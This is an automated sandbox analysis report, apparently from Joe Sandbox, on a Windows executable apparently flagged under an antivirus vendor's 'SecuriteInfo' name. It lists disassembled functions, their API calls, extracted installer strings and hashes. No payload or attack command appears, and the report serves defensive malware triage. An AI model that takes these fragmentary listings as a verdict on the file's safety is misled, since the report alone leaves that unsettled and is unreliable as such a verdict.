                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$BuffersFlushWrite$CriticalSection$HeapInit_thread_footer$AllocEnterFindInitializeLeaveLocalProcessResourceTime
                                                                                                                                                                        • String ID: %04d-%02d-%02d %02d-%02d-%02d$,_$l2
                                                                                                                                                                        • API String ID: 4294211394-487377711
                                                                                                                                                                        • Opcode ID: a2456c0fce4f69b0fa692d4c2f78e16977126a5ecfd54fc1a75165eb22e6d629
                                                                                                                                                                        • Instruction ID: 0608aee2caac8f1828983efd5dd90b0664548abbdac43b6a579279d6ad928fb7
                                                                                                                                                                        • Opcode Fuzzy Hash: a2456c0fce4f69b0fa692d4c2f78e16977126a5ecfd54fc1a75165eb22e6d629
                                                                                                                                                                        • Instruction Fuzzy Hash: C9A1CD71900608EFEB00DFA9CD45BBEBBB8FF08310F148169F951A72A1DB759944DBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD8910 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,000001F6), ref: 00CD895E
                                                                                                                                                                        • GetDlgItem.USER32(?,000001F8), ref: 00CD896B
                                                                                                                                                                        • GetDlgItem.USER32(?,000001F7), ref: 00CD89AD
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00CD89BC
                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00CD8A22
                                                                                                                                                                        • GetDlgItem.USER32(?,000001F7), ref: 00CD8A44
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00CD8A53
                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00CD8AB8
                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00CD8ABF
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000616), ref: 00CD8B08
                                                                                                                                                                        • GetDlgItem.USER32(?,00000000), ref: 00CD8B3A
                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00CD8B44
                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014,?,00000000,?,?,00000616), ref: 00CD8B91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Item$Show$Text
                                                                                                                                                                        • String ID: Details <<$Details >>
                                                                                                                                                                        • API String ID: 2476474966-3763984547
                                                                                                                                                                        • Opcode ID: 1db486afc1e9c25b5a9d46073912e8edc39845ac8768b39c0e17ad7e3e133a4d
                                                                                                                                                                        • Instruction ID: 86f5df2a804dd84e42add0537bfad2db2bebae0ea0bd49baf54cca516ff7a2cd
                                                                                                                                                                        • Opcode Fuzzy Hash: 1db486afc1e9c25b5a9d46073912e8edc39845ac8768b39c0e17ad7e3e133a4d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7391A071D10209AFDF149F68DC85BAEBBB5FF48310F10821AF515B7691DB30A999CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CEA490 Relevance: 21.5, APIs: 4, Strings: 8, Instructions: 455COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,1FC3D414), ref: 00CEA4F9
                                                                                                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00CEA500
                                                                                                                                                                          • Part of subcall function 00CCC2F0: _wcsrchr.LIBVCRUNTIME ref: 00CCC329
                                                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00CEA581
                                                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00CEA617
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsrchr$Process$CurrentWow64
                                                                                                                                                                        • String ID: "%s" $ /fvomus //$ /i //$ /p //$ EXE_CMD_LINE="%s "$ TRANSFORMS=":%d"$%s AI_SETUPEXEPATH="%s" SETUPEXEDIR="%s"$.x64
                                                                                                                                                                        • API String ID: 657290924-2074823060
                                                                                                                                                                        • Opcode ID: 79bbfd5543ee5d998baf6b6356879fc16ef284287b7eb58ff63bd5b0a4a5ead0
                                                                                                                                                                        • Instruction ID: 27d9ec556b4518750c3d8d60685bfbdbdf1c42cfc00c5d371c8ef4b77af330b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 79bbfd5543ee5d998baf6b6356879fc16ef284287b7eb58ff63bd5b0a4a5ead0
                                                                                                                                                                        • Instruction Fuzzy Hash: EEF1D231A016459FDB10DF69CC45BAEB7F4EF45310F18826CE925AB2D2DB74AE04CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BEB200 Relevance: 21.4, APIs: 4, Strings: 8, Instructions: 358libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 00BEB328
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 00BEB341
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000043,ShutdownEmbeddedUI), ref: 00BEB34D
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000043,EmbeddedUIHandler), ref: 00BEB35A
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HeapInit_thread_footer$AllocLibraryLoadProcess
                                                                                                                                                                        • String ID: build $20.2$2c3f1cf9$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI
                                                                                                                                                                        • API String ID: 1086585969-3504904618
                                                                                                                                                                        • Opcode ID: 320d1a666acbdf97eaa09afaee3267a1b995532d34d1572a75355b1913f55632
                                                                                                                                                                        • Instruction ID: b858b07762ec3a02ccc14904fc6736a5b9aa69b553f21917c2ef8381352d0fba
                                                                                                                                                                        • Opcode Fuzzy Hash: 320d1a666acbdf97eaa09afaee3267a1b995532d34d1572a75355b1913f55632
                                                                                                                                                                        • Instruction Fuzzy Hash: E2D1AF71D00249AFDB04DFA8CC55BEEBBF4FF44310F148669E911A7291EB74AA44CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BBEE80 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 267libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,1FC3D414,00E2ADDC,?,?,?,?,?,?,?,?,?,?,?,1FC3D414), ref: 00BBEEFB
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BBEF01
                                                                                                                                                                        • LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,00E1329C,00000000,00000000,00000000), ref: 00BBF08B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad$AddressProc
                                                                                                                                                                        • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                                                                                                                        • API String ID: 1469910268-2454113998
                                                                                                                                                                        • Opcode ID: 70fa8b0be005801558a4f735932656c224bd370188598923784daf24bc3f29f2
                                                                                                                                                                        • Instruction ID: a7f32587655879950c159333134900fe5495d5a47fca9b051ea7f98e7bc5fffe
                                                                                                                                                                        • Opcode Fuzzy Hash: 70fa8b0be005801558a4f735932656c224bd370188598923784daf24bc3f29f2
                                                                                                                                                                        • Instruction Fuzzy Hash: 8EB13B7190020AEFDB14DFA8C895BFDB7F5EF48300F144569E415A72A1EBB49A45CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BBE620 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 233libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory), ref: 00BBE62E
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BBE634
                                                                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?), ref: 00BBE667
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BBE66D
                                                                                                                                                                        • LoadLibraryW.KERNEL32(?,.dll,00000004,-00000001,00000000,00E1329C,00000000,00000000,00000000), ref: 00BBE78D
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BBE7D6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                                                                                                                        • API String ID: 2574300362-2454113998
                                                                                                                                                                        • Opcode ID: 25b7cdd7d475555d5f17264fb943f2c524383b06de93256b442ae4ff090e7fff
                                                                                                                                                                        • Instruction ID: 971ab6aac565e7ec505edfa9660043e9b884b75bd3bfff64302beab00b0d6013
                                                                                                                                                                        • Opcode Fuzzy Hash: 25b7cdd7d475555d5f17264fb943f2c524383b06de93256b442ae4ff090e7fff
                                                                                                                                                                        • Instruction Fuzzy Hash: 98915B71D10209DFDB14DFA8C895BFDB7F1EF58300F2481A9E521A72A0EBB49A45CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CDB080 Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 410libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CF65B0: GetSystemDefaultLangID.KERNEL32(1FC3D414,0000004C,?,00000048,?), ref: 00CF65E6
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00CDB1E3
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00CDB1EA
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CDB201
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000), ref: 00CDB220
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressCurrentDefaultHandleInit_thread_footerLangModuleProcProcessSystem
                                                                                                                                                                        • String ID: IsWow64Process2$Not selected for install.$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32
                                                                                                                                                                        • API String ID: 52476621-4272450043
                                                                                                                                                                        • Opcode ID: fd72aa3c5830d9100aee2231b5df39a64314334336ebdc147dd979e2b11f9a47
                                                                                                                                                                        • Instruction ID: 1942dba1fab0fa3b42c54d3228b055503415cfd0358c5ef731526b8b44ded87f
                                                                                                                                                                        • Opcode Fuzzy Hash: fd72aa3c5830d9100aee2231b5df39a64314334336ebdc147dd979e2b11f9a47
                                                                                                                                                                        • Instruction Fuzzy Hash: 12F1AC70900604DFDB14DFA9C994BAEB7F1BF44310F15825EE626AB391EB31AD46CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE5200 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 229windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,1FC3D414), ref: 00BE5288
                                                                                                                                                                          • Part of subcall function 00BC72B0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BC72E6
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00BE538B
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00BE539F
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,00000003,?), ref: 00BE53B4
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 00BE53C9
                                                                                                                                                                        • SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00BE53E0
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00BE5412
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00BE5474
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00BE5484
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Window$CreateLongRect
                                                                                                                                                                        • String ID: ,$tooltips_class32
                                                                                                                                                                        • API String ID: 1954517558-3856767331
                                                                                                                                                                        • Opcode ID: cf5683b464f5279adeb92e57f8d901dcf0691d9855117fb741c80e3741697a77
                                                                                                                                                                        • Instruction ID: 2ea79b1e054aaff164ccdd62e91196b134467343c4462d698ca28135992447a6
                                                                                                                                                                        • Opcode Fuzzy Hash: cf5683b464f5279adeb92e57f8d901dcf0691d9855117fb741c80e3741697a77
                                                                                                                                                                        • Instruction Fuzzy Hash: 94913071A00348AFDB14CFA5CC95FAEBBF9FB08700F10852AF556EA691D774A908CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD8600 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 132windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CCFF30: LoadLibraryW.KERNEL32(ComCtl32.dll,1FC3D414,?,00000000,00000000), ref: 00CCFF6E
                                                                                                                                                                          • Part of subcall function 00CCFF30: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00CCFF91
                                                                                                                                                                          • Part of subcall function 00CCFF30: FreeLibrary.KERNEL32(00000000), ref: 00CD000F
                                                                                                                                                                        • GetDlgItem.USER32(?,000001F4), ref: 00CD8641
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 00CD8652
                                                                                                                                                                        • MulDiv.KERNEL32(00000009,00000000), ref: 00CD866A
                                                                                                                                                                        • GetDlgItem.USER32(?,000001F6), ref: 00CD86A4
                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00CD86AD
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,?,00000000), ref: 00CD86C4
                                                                                                                                                                        • GetDlgItem.USER32(?,000001F8), ref: 00CD86CE
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00CD86DF
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00CD86F2
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00CD8702
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ItemRect$LibraryMessageSend$AddressFreeLoadProc
                                                                                                                                                                        • String ID: Courier New
                                                                                                                                                                        • API String ID: 1717253393-2572734833
                                                                                                                                                                        • Opcode ID: 7340a6beba2642485f6081aa4b9e397415553acfe789a32568e07eb011dd1b20
                                                                                                                                                                        • Instruction ID: 75db46828dccbe1da40d3d226aaf44d1beb4de2fb02bebf5b6eea380a3b7501a
                                                                                                                                                                        • Opcode Fuzzy Hash: 7340a6beba2642485f6081aa4b9e397415553acfe789a32568e07eb011dd1b20
                                                                                                                                                                        • Instruction Fuzzy Hash: BF41D771B843087FEB149F258C42FAE7799EF48B04F01061EFB497A2D1DAB0A8448B59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C29970 Relevance: 16.7, APIs: 11, Instructions: 170COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C299B7
                                                                                                                                                                        • GetParent.USER32 ref: 00C299CD
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00C299D8
                                                                                                                                                                        • GetParent.USER32(00000000), ref: 00C299E0
                                                                                                                                                                        • GetWindow.USER32(?,00000004), ref: 00C29A12
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00C29A20
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C29A2D
                                                                                                                                                                        • MonitorFromWindow.USER32(00000000,00000002), ref: 00C29A45
                                                                                                                                                                        • GetMonitorInfoW.USER32(00000000,00000000), ref: 00C29A5F
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,00000004), ref: 00C29B0D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$LongMonitorParentRect$FromInfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1820395375-0
                                                                                                                                                                        • Opcode ID: 3595af7428c166f5bbae25040bc968d21d01847afaa3a020c718aa5d34c35027
                                                                                                                                                                        • Instruction ID: bdbb9d045f19c91d6201b3fd1e7e66079df4e25c503c0000a27273ed05105b1b
                                                                                                                                                                        • Opcode Fuzzy Hash: 3595af7428c166f5bbae25040bc968d21d01847afaa3a020c718aa5d34c35027
                                                                                                                                                                        • Instruction Fuzzy Hash: 24515272D14229DFDB20CF69DD45A9DBBB9FB48710F24422AE815F3295DB30AD05CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CE2210 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 283COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CD6E80: LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,00CE2271,?,1FC3D414,?,?), ref: 00CD6E9B
                                                                                                                                                                          • Part of subcall function 00CD6E80: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00CD6EB1
